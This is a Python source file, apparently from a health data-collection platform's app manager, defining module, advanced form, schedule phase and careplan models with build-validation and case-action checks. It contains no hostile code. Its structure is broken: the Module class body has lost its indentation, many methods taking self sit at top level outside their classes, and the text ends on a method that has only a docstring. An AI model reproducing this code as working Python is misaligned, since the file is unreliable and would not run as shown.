    def get_subcase_types(self):
        '''
        Return a set of each case type for which this module has a form that
        opens a new subcase of that type.
        '''
        subcase_types = set()
        for form in self.get_forms():
            if hasattr(form, 'get_subcase_types'):
                subcase_types.update(form.get_subcase_types())
        return subcase_types

    def get_custom_entries(self):
        """
        By default, suite entries are configured by forms, but you can also provide custom
        entries by overriding this function.

        See ReportModule for an example
        """
        return []

    def uses_media(self):
        """
        Whether the module uses media. If this returns false then media will not be generated
        for the module.
        """
        return True

    def uses_usercase(self):
        return False
class ModuleDetailsMixin():
    """Mixin for modules that carry case/referral DetailPairs.

    NOTE(review): methods here assume attributes of the concrete class
    (case_details, ref_details, case_list, referral_list) and rename_lang
    hard-codes ``Module`` in its super() call — only safe when mixed into
    Module.
    """

    @classmethod
    def wrap_details(cls, data):
        """Lazy migration: unpack the legacy 4-tuple ``details`` list into
        ``case_details``/``ref_details`` dicts, then drop ``details``."""
        if 'details' in data:
            try:
                case_short, case_long, ref_short, ref_long = data['details']
            except ValueError:
                # "need more than 0 values to unpack"
                pass
            else:
                data['case_details'] = {
                    'short': case_short,
                    'long': case_long,
                }
                data['ref_details'] = {
                    'short': ref_short,
                    'long': ref_long,
                }
            finally:
                del data['details']
        return data

    @property
    def case_list_filter(self):
        # None when no short case detail (or filter) is configured.
        try:
            return self.case_details.short.filter
        except AttributeError:
            return None

    @property
    def detail_sort_elements(self):
        try:
            return self.case_details.short.sort_elements
        except Exception:
            return []

    def rename_lang(self, old_lang, new_lang):
        # NOTE(review): super(Module, ...) ties this mixin to Module.
        super(Module, self).rename_lang(old_lang, new_lang)
        for case_list in (self.case_list, self.referral_list):
            case_list.rename_lang(old_lang, new_lang)

    def export_json(self, dump_json=True, keep_unique_id=False):
        """Serialize this module, optionally stripping form unique_ids.

        :param dump_json: return a JSON string when True, else a dict
        """
        source = self.to_json()
        if not keep_unique_id:
            for form in source['forms']:
                del form['unique_id']
        return json.dumps(source) if dump_json else source

    def get_details(self):
        """(name, detail, enabled) triples for all four detail screens."""
        return (
            ('case_short', self.case_details.short, True),
            ('case_long', self.case_details.long, True),
            ('ref_short', self.ref_details.short, False),
            ('ref_long', self.ref_details.long, False),
        )

    def validate_details_for_build(self):
        """Validate sort fields, the case list filter xpath, and case tile
        configuration; returns a list of error dicts."""
        errors = []
        for sort_element in self.detail_sort_elements:
            try:
                validate_detail_screen_field(sort_element.field)
            except ValueError:
                errors.append({
                    'type': 'invalid sort field',
                    'field': sort_element.field,
                    'module': self.get_module_info(),
                })
        if self.case_list_filter:
            try:
                # Interpolate case references before checking xpath syntax.
                case_list_filter = interpolate_xpath(self.case_list_filter)
                etree.XPath(case_list_filter)
            except (etree.XPathSyntaxError, CaseXPathValidationError):
                errors.append({
                    'type': 'invalid filter xpath',
                    'module': self.get_module_info(),
                    'filter': self.case_list_filter,
                })
        for detail in [self.case_details.short, self.case_details.long]:
            if detail.use_case_tiles:
                # Tiles are only valid on the short (case list) detail.
                if not detail.display == "short":
                    errors.append({
                        'type': "invalid tile configuration",
                        'module': self.get_module_info(),
                        'reason': _('Case tiles may only be used for the case list (not the case details).')
                    })
                # Every tile slot must have a column assigned to it.
                col_by_tile_field = {c.case_tile_field: c for c in detail.columns}
                for field in ["header", "top_left", "sex", "bottom_left", "date"]:
                    if field not in col_by_tile_field:
                        errors.append({
                            'type': "invalid tile configuration",
                            'module': self.get_module_info(),
                            'reason': _('A case property must be assigned to the "{}" tile field.'.format(field))
                        })
        return errors

    def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
        """Yield error dicts for missing case type / case detail / referral
        detail configuration, plus any invalid detail columns."""
        module_info = self.get_module_info()

        if needs_case_type and not self.case_type:
            yield {
                'type': 'no case type',
                'module': module_info,
            }

        if needs_case_detail:
            if not self.case_details.short.columns:
                yield {
                    'type': 'no case detail',
                    'module': module_info,
                }
            columns = self.case_details.short.columns + self.case_details.long.columns
            errors = self.validate_detail_columns(columns)
            for error in errors:
                yield error

        if needs_referral_detail and not self.ref_details.short.columns:
            yield {
                'type': 'no ref detail',
                'module': module_info,
            }
class Module(ModuleBase, ModuleDetailsMixin):
"""
A group of related forms, and configuration that applies to them all.
Translates to a top-level menu on the phone.
"""
module_type = 'basic'
case_label = DictProperty()
referral_label = DictProperty()
forms = SchemaListProperty(Form)
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(Module, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = Module(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
case_label={(lang or 'en'): 'Cases'},
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=''):
form = Form(
name={lang if lang else "en": name if name else _("Untitled Form")},
)
self.forms.append(form)
form = self.get_form(-1)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, Form):
new_form = form
elif isinstance(form, AdvancedForm) and not form.actions.get_all_actions():
new_form = Form(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
else:
raise IncompatibleFormTypeException()
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def validate_for_build(self):
errors = super(Module, self).validate_for_build() + self.validate_details_for_build()
if not self.forms and not self.case_list.show:
errors.append({
'type': 'no forms or case list',
'module': self.get_module_info(),
})
return errors
def requires(self):
r = set(["none"])
for form in self.get_forms():
r.add(form.requires)
if self.case_list.show:
r.add('case')
if self.referral_list.show:
r.add('referral')
for val in ("referral", "case", "none"):
if val in r:
return val
def requires_case_details(self):
    """True when the module needs a case-detail screen: either the case list
    is shown, or at least one form requires a case."""
    if self.case_list.show:
        return True
    return any(form.requires_case() for form in self.get_forms())
@memoized
def all_forms_require_a_case(self):
    """True when every form in this module requires a case (memoized)."""
    return all(form.requires == 'case' for form in self.get_forms())

def uses_usercase(self):
    """Return True if this module has any forms that use the usercase.
    """
    for form in self.get_forms():
        if form.uses_usercase():
            return True
    return False
class AdvancedForm(IndexedFormBase, NavMenuItemMediaMixin):
    """Form with explicit (advanced) case management actions."""
    form_type = 'advanced_form'
    form_filter = StringProperty()
    actions = SchemaProperty(AdvancedFormActions)
    schedule = SchemaProperty(FormSchedule, default=None)

    @classmethod
    def wrap(cls, data):
        # lazy migration to swap keys with values in action preload dict.
        # http://manage.dimagi.com/default.asp?162213
        load_actions = data.get('actions', {}).get('load_update_cases', [])
        for action in load_actions:
            preload = action['preload']
            # a value starting with '/' means the dict is still the old
            # {property: path} orientation and must be inverted.
            # NOTE: Python 2 only — .values()[0] is not subscriptable on Py3
            if preload and preload.values()[0].startswith('/'):
                action['preload'] = {v: k for k, v in preload.items()}
        return super(AdvancedForm, cls).wrap(data)
def pre_delete_hook(self):
    """Best-effort schedule cleanup before this form is deleted.

    Errors are logged and swallowed so a broken schedule never blocks
    deleting the form. (Removed a redundant ``pass`` after the log call.)
    """
    try:
        self.disable_schedule()
    except (ScheduleError, TypeError, AttributeError) as e:
        logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
                      "There is probably nothing to worry about, but you could check to make sure "
                      "that there are no issues with this form.".format(error=e, form_id=self.unique_id))
def pre_move_hook(self, from_module, to_module):
    """Best-effort schedule cleanup before this form moves between modules.

    Only acts when the form actually changes module; errors are logged and
    swallowed. (Removed a redundant ``pass`` after the log call.)
    """
    if from_module != to_module:
        try:
            self.disable_schedule()
        except (ScheduleError, TypeError, AttributeError) as e:
            logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
                          "There is probably nothing to worry about, but you could check to make sure "
                          "that there are no issues with this module.".format(error=e, form_id=self.unique_id))
def add_stuff_to_xform(self, xform, build_profile_id=None):
    """Attach advanced case/meta blocks to the XForm."""
    super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
    xform.add_case_and_meta_advanced(self)

def requires_case(self):
    """Form requires a case that must be selected by the user (excludes autoloaded cases)
    """
    return any(not action.auto_select for action in self.actions.load_update_cases)

@property
def requires(self):
    # mirrors basic Form's requires values ('case'/'none')
    return 'case' if self.requires_case() else 'none'
def is_registration_form(self, case_type=None):
    """
    Defined as form that opens a single case. If the case is a sub-case then
    the form is only allowed to load parent cases (and any auto-selected cases).
    """
    reg_actions = self.get_registration_actions(case_type)
    if len(reg_actions) != 1:
        return False

    load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
    if not load_actions:
        return True

    reg_action = reg_actions[0]
    if not reg_action.case_indices:
        return False

    # deep-copied so the recursive walk can destructively pop tags
    actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
    actions_by_tag.pop(reg_action.case_tag)

    def check_parents(tag):
        """Recursively check parent actions to ensure that all actions for this form are
        either parents of the registration action or else auto-select actions.
        """
        if not tag:
            # parent chain exhausted: anything left must be auto-select
            return not actions_by_tag or all(
                getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
            )
        try:
            parent = actions_by_tag.pop(tag)
        except KeyError:
            return False
        return all(check_parents(p.tag) for p in parent['action'].case_indices)

    return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
    """
    :return: List of actions that create a case. Subcase actions are included
             as long as they are not inside a repeat. If case_type is not None
             only return actions that create a case of the specified type.
    """
    matching = []
    for action in self.actions.get_open_actions():
        if action.is_subcase and action.repeat_context:
            continue  # subcase inside a repeat: excluded
        if case_type and action.case_type != case_type:
            continue
        matching.append(action)
    return matching

def uses_case_type(self, case_type, invert_match=False):
    """True when any load/update action's case type matches *case_type*
    (or does NOT match, when invert_match is set)."""
    for action in self.actions.load_update_cases:
        if (action.case_type == case_type) != invert_match:
            return True
    return False
def uses_usercase(self):
    """True if any load/update action targets the usercase type."""
    return self.uses_case_type(USERCASE_TYPE)

def all_other_forms_require_a_case(self):
    """True when every OTHER form in this module requires a case."""
    m = self.get_module()
    return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])

def get_module(self):
    # _parent is wired up by the containing module's schema list
    return self._parent

def get_phase(self):
    """Return the schedule phase containing this form, or None."""
    module = self.get_module()
    return next((phase for phase in module.get_schedule_phases()
                 for form in phase.get_forms()
                 if form.unique_id == self.unique_id),
                None)

def disable_schedule(self):
    """Turn off this form's schedule and detach it from its phase, if any."""
    self.schedule.enabled = False
    phase = self.get_phase()
    if phase:
        phase.remove_form(self)
def check_actions(self):
    """Validate this form's case actions.

    :return: list of error dicts (each carries a 'type' key plus context)
    """
    errors = []

    # subcase actions: parent tags must exist, open actions need a name
    # path, and subcase repeats must nest inside their parent's repeat
    for action in self.actions.get_subcase_actions():
        case_tags = self.actions.get_case_tags()
        for case_index in action.case_indices:
            if case_index.tag not in case_tags:
                errors.append({'type': 'missing parent tag', 'case_tag': case_index.tag})

        if isinstance(action, AdvancedOpenCaseAction):
            if not action.name_path:
                errors.append({'type': 'case_name required', 'case_tag': action.case_tag})

            for case_index in action.case_indices:
                meta = self.actions.actions_meta_by_tag.get(case_index.tag)
                if meta and meta['type'] == 'open' and meta['action'].repeat_context:
                    if (
                        not action.repeat_context or
                        not action.repeat_context.startswith(meta['action'].repeat_context)
                    ):
                        errors.append({'type': 'subcase repeat context',
                                       'case_tag': action.case_tag,
                                       'parent_tag': case_index.tag})

        errors.extend(self.check_case_properties(
            subcase_names=action.get_property_names(),
            case_tag=action.case_tag
        ))

    # all actions: must have a case type unless auto-select; auto-select
    # actions need a key/source appropriate for their mode
    for action in self.actions.get_all_actions():
        if not action.case_type and (not isinstance(action, LoadUpdateAction) or not action.auto_select):
            errors.append({'type': "no case type in action", 'case_tag': action.case_tag})

        if isinstance(action, LoadUpdateAction) and action.auto_select:
            mode = action.auto_select.mode
            if not action.auto_select.value_key:
                key_names = {
                    AUTO_SELECT_CASE: _('Case property'),
                    AUTO_SELECT_FIXTURE: _('Lookup Table field'),
                    AUTO_SELECT_USER: _('custom user property'),
                    AUTO_SELECT_RAW: _('custom XPath expression'),
                }
                if mode in key_names:
                    errors.append({'type': 'auto select key', 'key_name': key_names[mode]})

            if not action.auto_select.value_source:
                source_names = {
                    AUTO_SELECT_CASE: _('Case tag'),
                    AUTO_SELECT_FIXTURE: _('Lookup Table tag'),
                }
                if mode in source_names:
                    errors.append({'type': 'auto select source', 'source_name': source_names[mode]})
            elif mode == AUTO_SELECT_CASE:
                # referenced case tag must resolve to an action in this form
                case_tag = action.auto_select.value_source
                if not self.actions.get_action_from_tag(case_tag):
                    errors.append({'type': 'auto select case ref', 'case_tag': action.case_tag})

        errors.extend(self.check_case_properties(
            all_names=action.get_property_names(),
            case_tag=action.case_tag
        ))

    # a case-referencing form filter requires at least one user-selected case
    if self.form_filter:
        form_filter_references_case = (
            xpath_references_case(self.form_filter) or
            xpath_references_user_case(self.form_filter)
        )
        if form_filter_references_case:
            if not any(action for action in self.actions.load_update_cases if not action.auto_select):
                errors.append({'type': "filtering without case"})

    def generate_paths():
        for action in self.actions.get_all_actions():
            for path in action.get_paths():
                yield path

    errors.extend(self.check_paths(generate_paths()))

    return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
    """Run form-level action checks (tagged with *error_meta*) and,
    optionally, module-level case-error checks."""
    errors = []

    if xml_valid:
        for err in self.check_actions():
            err.update(error_meta)
            errors.append(err)

    if validate_module:
        module = self.get_module()
        errors.extend(module.get_case_errors(
            needs_case_type=False,
            needs_case_detail=module.requires_case_details(),
            needs_referral_detail=False,
        ))

    return errors
def get_case_updates(self, case_type):
    """Return the set of formatted case-property keys this form saves for
    *case_type*, including scheduler updates when the schedule is enabled."""
    updates = set()
    format_key = self.get_case_property_name_formatter()
    for action in self.actions.get_all_actions():
        if action.case_type == case_type:
            updates.update(format_key(*item)
                           for item in action.case_properties.iteritems())
    if self.schedule and self.schedule.enabled and self.source:
        # parse the XForm to extract scheduler-generated updates
        xform = self.wrapped_xform()
        self.add_stuff_to_xform(xform)
        scheduler_updates = xform.get_scheduler_case_updates()[case_type]
    else:
        scheduler_updates = set()

    return updates.union(scheduler_updates)

@memoized
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
    """Return (parent (case_type, reference_id) pairs, contributed property
    names) for subcases of *case_type* opened by this form.

    module_case_type is unused here; kept for signature parity with
    CareplanForm's version of this method.
    """
    parent_types = set()
    case_properties = set()
    for subcase in self.actions.get_subcase_actions():
        if subcase.case_type == case_type:
            case_properties.update(
                subcase.case_properties.keys()
            )
            for case_index in subcase.case_indices:
                parent = self.actions.get_action_from_tag(case_index.tag)
                if parent:
                    parent_types.add((parent.case_type, case_index.reference_id or 'parent'))

    return parent_types, case_properties
def update_app_case_meta(self, app_case_meta):
    """Register this form's property saves/loads and case openers/closers
    on *app_case_meta*."""
    from corehq.apps.reports.formdetails.readable import FormQuestionResponse
    questions = {
        q['value']: FormQuestionResponse(q)
        for q in self.get_questions(self.get_app().langs, include_translations=True)
    }
    # load/update actions: saves, preloads, and close conditions
    for action in self.actions.load_update_cases:
        for name, question_path in action.case_properties.items():
            self.add_property_save(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path
            )
        for question_path, name in action.preload.items():
            self.add_property_load(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path
            )
        if action.close_condition.is_active():
            meta = app_case_meta.get_type(action.case_type)
            meta.add_closer(self.unique_id, action.close_condition)

    # open actions: the implicit 'name' save, plus configured saves
    for action in self.actions.open_cases:
        self.add_property_save(
            app_case_meta,
            action.case_type,
            'name',
            questions,
            action.name_path,
            action.open_condition
        )
        for name, question_path in action.case_properties.items():
            self.add_property_save(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path,
                action.open_condition
            )
        meta = app_case_meta.get_type(action.case_type)
        meta.add_opener(self.unique_id, action.open_condition)
        if action.close_condition.is_active():
            meta.add_closer(self.unique_id, action.close_condition)
class SchedulePhaseForm(IndexedSchema):
    """
    A reference to a form in a schedule phase.
    """
    form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
    """
    SchedulePhases are attached to a module.
    A Schedule Phase is a grouping of forms that occur within a period and share an anchor
    A module should not have more than one SchedulePhase with the same anchor

    anchor: Case property containing a date after which this phase becomes active
    forms: The forms that are to be filled out within this phase
    """
    anchor = StringProperty()
    forms = SchemaListProperty(SchedulePhaseForm)

    @property
    def id(self):
        """ A Schedule Phase is 1-indexed """
        _id = super(SchedulePhase, self).id
        return _id + 1

    @property
    def phase_id(self):
        # stable identifier combining anchor and 1-based index
        return "{}_{}".format(self.anchor, self.id)

    def get_module(self):
        return self._parent

    _get_forms = IndexedSchema.Getter('forms')

    def get_forms(self):
        """Returns the actual form objects related to this phase"""
        module = self.get_module()
        return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())

    def get_form(self, desired_form):
        """Return this phase's form matching desired_form's unique_id, or None."""
        return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)

    def get_phase_form_index(self, form):
        """
        Returns the index of the form with respect to the phase

        schedule_phase.forms = [a,b,c]
        schedule_phase.get_phase_form_index(b)
        => 1
        schedule_phase.get_phase_form_index(c)
        => 2
        """
        return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
                    None)

    def remove_form(self, form):
        """Remove a form from the phase"""
        idx = self.get_phase_form_index(form)
        if idx is None:
            raise ScheduleError("That form doesn't exist in the phase")

        self.forms.remove(self.forms[idx])

    def add_form(self, form):
        """Adds a form to this phase, removing it from other phases"""
        old_phase = form.get_phase()
        if old_phase is not None and old_phase.anchor != self.anchor:
            old_phase.remove_form(form)

        if self.get_form(form) is None:
            self.forms.append(SchedulePhaseForm(form_id=form.unique_id))

    def change_anchor(self, new_anchor):
        """Set a new anchor, raising ScheduleError on blank or duplicate anchors.

        NOTE(review): the anchor is assigned BEFORE the duplicate check, so a
        failed change leaves self.anchor updated — confirm this is intended
        (the count>1 check appears to rely on the new value being in place).
        """
        if new_anchor is None or new_anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))

        self.anchor = new_anchor

        if self.get_module().phase_anchors.count(new_anchor) > 1:
            raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
    """Module whose forms use advanced (explicit) case management actions."""
    module_type = 'advanced'
    case_label = DictProperty()
    forms = SchemaListProperty(AdvancedForm)
    case_details = SchemaProperty(DetailPair)
    product_details = SchemaProperty(DetailPair)
    put_in_root = BooleanProperty(default=False)
    case_list = SchemaProperty(CaseList)
    has_schedule = BooleanProperty()
    schedule_phases = SchemaListProperty(SchedulePhase)
    get_schedule_phases = IndexedSchema.Getter('schedule_phases')
    # NOTE(review): a LIST here, whereas Module.search_config is a single
    # SchemaProperty(CaseSearch) — confirm the asymmetry is intentional
    search_config = SchemaListProperty(CaseSearch)
@classmethod
def new_module(cls, name, lang):
    """Create a fresh AdvancedModule with default case and product details.

    :param name: display name; falls back to "Untitled Module"
    :param lang: language code; falls back to 'en'
    :return: the new module, with a unique id already assigned
    """
    detail = Detail(
        columns=[DetailColumn(
            format='plain',
            header={(lang or 'en'): ugettext("Name")},
            field='name',
            model='case',
        )]
    )

    module = AdvancedModule(
        name={(lang or 'en'): name or ugettext("Untitled Module")},
        forms=[],
        case_type='',
        case_details=DetailPair(
            short=Detail(detail.to_json()),
            long=Detail(detail.to_json()),
        ),
        # product details support CommTrack-enabled apps
        product_details=DetailPair(
            short=Detail(
                columns=[
                    DetailColumn(
                        format='plain',
                        header={(lang or 'en'): ugettext("Product")},
                        field='name',
                        model='product',
                    ),
                ],
            ),
            long=Detail(),
        ),
    )
    module.get_or_create_unique_id()
    return module
def new_form(self, name, lang, attachment=''):
    """Append a new AdvancedForm (schedule disabled) and set its source."""
    form = AdvancedForm(
        name={lang if lang else "en": name if name else _("Untitled Form")},
    )
    form.schedule = FormSchedule(enabled=False)

    self.forms.append(form)
    # re-fetch via get_form so the returned instance is bound to this module
    form = self.get_form(-1)
    form.source = attachment
    return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
    """Add *form* to this module, converting a basic Form's case actions to
    advanced actions when necessary.

    :param from_module: module the form comes from; supplies the case type
        and parent-select configuration used during conversion
    :param form: an AdvancedForm (inserted as-is) or a basic Form (converted)
    :param index: position to insert at; appends when None
    :param with_source: also copy the XForm source on conversion
    :raises IncompatibleFormTypeException: for any other form type
    :return: the form as bound to this module

    Bug fix: ``index`` was previously tested for truthiness (``if index:``),
    so inserting at position 0 silently appended instead, and the return
    used ``index or -1`` which fetched the wrong form for index 0. Now
    matches Module.add_insert_form's ``is not None`` handling.
    """
    if isinstance(form, AdvancedForm):
        new_form = form
    elif isinstance(form, Form):
        # convert basic form actions into the advanced equivalents
        new_form = AdvancedForm(
            name=form.name,
            form_filter=form.form_filter,
            media_image=form.media_image,
            media_audio=form.media_audio
        )
        new_form._parent = self
        form._parent = self
        if with_source:
            new_form.source = form.source
        actions = form.active_actions()
        open = actions.get('open_case', None)
        update = actions.get('update_case', None)
        close = actions.get('close_case', None)
        preload = actions.get('case_preload', None)
        subcases = actions.get('subcases', None)
        case_type = from_module.case_type

        base_action = None
        if open:
            base_action = AdvancedOpenCaseAction(
                case_type=case_type,
                case_tag='open_{0}_0'.format(case_type),
                name_path=open.name_path,
                open_condition=open.condition,
                case_properties=update.update if update else {},
            )
            new_form.actions.open_cases.append(base_action)
        elif update or preload or close:
            base_action = LoadUpdateAction(
                case_type=case_type,
                case_tag='load_{0}_0'.format(case_type),
                case_properties=update.update if update else {},
                preload=preload.preload if preload else {}
            )

            if from_module.parent_select.active:
                # build a chain of parent load actions, outermost first
                app = self.get_app()
                select_chain = get_select_chain(app, from_module, include_self=False)
                for n, link in enumerate(reversed(list(enumerate(select_chain)))):
                    i, module = link
                    new_form.actions.load_update_cases.append(LoadUpdateAction(
                        case_type=module.case_type,
                        case_tag='_'.join(['parent'] * (i + 1)),
                        details_module=module.unique_id,
                        case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
                    ))
                base_action.case_indices = [CaseIndex(tag='parent')]

            if close:
                base_action.close_condition = close.condition
            new_form.actions.load_update_cases.append(base_action)

        if subcases:
            for i, subcase in enumerate(subcases):
                open_subcase_action = AdvancedOpenCaseAction(
                    case_type=subcase.case_type,
                    case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
                    name_path=subcase.case_name,
                    open_condition=subcase.condition,
                    case_properties=subcase.case_properties,
                    repeat_context=subcase.repeat_context,
                    case_indices=[CaseIndex(
                        tag=base_action.case_tag if base_action else '',
                        reference_id=subcase.reference_id,
                    )]
                )
                new_form.actions.open_cases.append(open_subcase_action)
    else:
        raise IncompatibleFormTypeException()

    if index is not None:
        self.forms.insert(index, new_form)
    else:
        self.forms.append(new_form)
    return self.get_form(-1 if index is None else index)
def rename_lang(self, old_lang, new_lang):
    """Rename a language code in base properties and the case list."""
    super(AdvancedModule, self).rename_lang(old_lang, new_lang)
    self.case_list.rename_lang(old_lang, new_lang)
def requires_case_details(self):
    """True when a case-detail screen is needed: the case list is shown, or
    some form loads/updates a case of this module's case type.

    Fix: previously fell off the end and implicitly returned None; now
    returns an explicit False (still falsy, so backward compatible) to
    match Module.requires_case_details.
    """
    if self.case_list.show:
        return True
    for form in self.forms:
        if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
            return True
    return False
def all_forms_require_a_case(self):
    # unlike Module's version, this is not memoized and checks
    # requires_case() directly
    return all(form.requires_case() for form in self.forms)

def get_details(self):
    """Yield (detail name, Detail, enabled?) tuples for suite generation;
    product details are only enabled when CommTrack is on."""
    return (
        ('case_short', self.case_details.short, True),
        ('case_long', self.case_details.long, True),
        ('product_short', self.product_details.short, self.get_app().commtrack_enabled),
        ('product_long', self.product_details.long, False),
    )
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
    """Generator of case-configuration error dicts for this module.

    needs_referral_detail is accepted for signature parity but unused here.
    """
    module_info = self.get_module_info()

    if needs_case_type and not self.case_type:
        yield {
            'type': 'no case type',
            'module': module_info,
        }

    if needs_case_detail:
        if not self.case_details.short.columns:
            yield {
                'type': 'no case detail',
                'module': module_info,
            }
        # CommTrack apps also need a product detail when stock is shown
        if self.get_app().commtrack_enabled and not self.product_details.short.columns:
            for form in self.forms:
                if self.case_list.show or \
                        any(action.show_product_stock for action in form.actions.load_update_cases):
                    yield {
                        'type': 'no product detail',
                        'module': module_info,
                    }
                    break
        columns = self.case_details.short.columns + self.case_details.long.columns
        if self.get_app().commtrack_enabled:
            columns += self.product_details.short.columns
        errors = self.validate_detail_columns(columns)
        for error in errors:
            yield error
def validate_for_build(self):
    """Collect build errors, including the extra constraints imposed when a
    case-list (registration) form is configured: every form must load the
    same case types via the same tag chain and use this module's details."""
    errors = super(AdvancedModule, self).validate_for_build()
    if not self.forms and not self.case_list.show:
        errors.append({
            'type': 'no forms or case list',
            'module': self.get_module_info(),
        })
    if self.case_list_form.form_id:
        forms = self.forms

        case_tag = None
        loaded_case_types = None
        for form in forms:
            info = self.get_module_info()
            form_info = {"id": form.id if hasattr(form, 'id') else None, "name": form.name}
            non_auto_select_actions = [a for a in form.actions.load_update_cases if not a.auto_select]
            this_forms_loaded_case_types = {action.case_type for action in non_auto_select_actions}
            if loaded_case_types is None:
                loaded_case_types = this_forms_loaded_case_types
            elif loaded_case_types != this_forms_loaded_case_types:
                errors.append({
                    'type': 'all forms in case list module must load the same cases',
                    'module': info,
                    'form': form_info,
                })

            if not non_auto_select_actions:
                errors.append({
                    'type': 'case list module form must require case',
                    'module': info,
                    'form': form_info,
                })
            elif len(non_auto_select_actions) != 1:
                # multiple user-selected cases: each must index its predecessor
                for index, action in reversed(list(enumerate(non_auto_select_actions))):
                    if (
                        index > 0 and
                        non_auto_select_actions[index - 1].case_tag not in (p.tag for p in action.case_indices)
                    ):
                        errors.append({
                            'type': 'case list module form can only load parent cases',
                            'module': info,
                            'form': form_info,
                        })

            case_action = non_auto_select_actions[-1] if non_auto_select_actions else None
            if case_action and case_action.case_type != self.case_type:
                errors.append({
                    'type': 'case list module form must match module case type',
                    'module': info,
                    'form': form_info,
                })

            # set case_tag if not already set
            case_tag = case_action.case_tag if not case_tag and case_action else case_tag
            if case_action and case_action.case_tag != case_tag:
                errors.append({
                    'type': 'all forms in case list module must have same case management',
                    'module': info,
                    'form': form_info,
                    'expected_tag': case_tag
                })

            if case_action and case_action.details_module and case_action.details_module != self.unique_id:
                errors.append({
                    'type': 'forms in case list module must use modules details',
                    'module': info,
                    'form': form_info,
                })

    return errors
def _uses_case_type(self, case_type, invert_match=False):
    # delegates the (possibly inverted) case-type match to each form
    return any(form.uses_case_type(case_type, invert_match) for form in self.forms)

def uses_usercase(self):
    """Return True if this module has any forms that use the usercase.
    """
    return self._uses_case_type(USERCASE_TYPE)

@property
def phase_anchors(self):
    # anchors of all schedule phases, in order (may contain duplicates)
    return [phase.anchor for phase in self.schedule_phases]
def get_or_create_schedule_phase(self, anchor):
    """Returns a tuple of (phase, new?)"""
    if anchor is None or anchor.strip() == '':
        raise ScheduleError(_("You can't create a phase without an anchor property"))

    phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
    is_new_phase = False

    if phase is None:
        self.schedule_phases.append(SchedulePhase(anchor=anchor))
        # TODO: is there a better way of doing this?
        phase = list(self.get_schedule_phases())[-1]  # get the phase from the module so we know the _parent
        is_new_phase = True

    return (phase, is_new_phase)

def _clear_schedule_phases(self):
    # drop ALL phases; callers re-add the ones they want to keep
    self.schedule_phases = []
def update_schedule_phases(self, anchors):
    """ Take a list of anchors, reorders, deletes and creates phases from it """
    # existing phases by anchor; popped as they are re-added in new order
    old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
    self._clear_schedule_phases()

    for anchor in anchors:
        try:
            self.schedule_phases.append(old_phases.pop(anchor))
        except KeyError:
            # anchor not previously present: create a fresh phase
            self.get_or_create_schedule_phase(anchor)

    # refuse to silently drop phases that still have forms attached
    deleted_phases_with_forms = [anchor for anchor, phase in old_phases.iteritems() if len(phase.forms)]
    if deleted_phases_with_forms:
        raise ScheduleError(_("You can't delete phases with anchors "
                              "{phase_anchors} because they have forms attached to them").format(
                                  phase_anchors=(", ").join(deleted_phases_with_forms)))

    return self.get_schedule_phases()
def update_schedule_phase_anchors(self, new_anchors):
    """Take a list of (phase_id, new_anchor) tuples and update phase anchors.

    phase_id is 1-indexed (see SchedulePhase.id); unknown ids are ignored.

    Cleanup: unpack the tuples directly, stop shadowing the builtin ``id``,
    and build the phase list once instead of on every iteration.
    """
    phases = list(self.get_schedule_phases())
    for phase_id, new_anchor in new_anchors:
        try:
            phases[phase_id - 1].change_anchor(new_anchor)
        except IndexError:
            pass  # That phase wasn't found, so we can't change its anchor. Ignore it
class CareplanForm(IndexedFormBase, NavMenuItemMediaMixin):
    """Base class for careplan goal/task forms; wrap() dispatches on doc_type."""
    form_type = 'careplan_form'
    # 'create' makes a new goal/task case; 'update' edits an existing one
    mode = StringProperty(required=True, choices=['create', 'update'])
    custom_case_updates = DictProperty()
    case_preload = DictProperty()
@classmethod
def wrap(cls, data):
    """Polymorphic wrap: dispatch to the concrete subclass named by
    data['doc_type'] when called on the base class."""
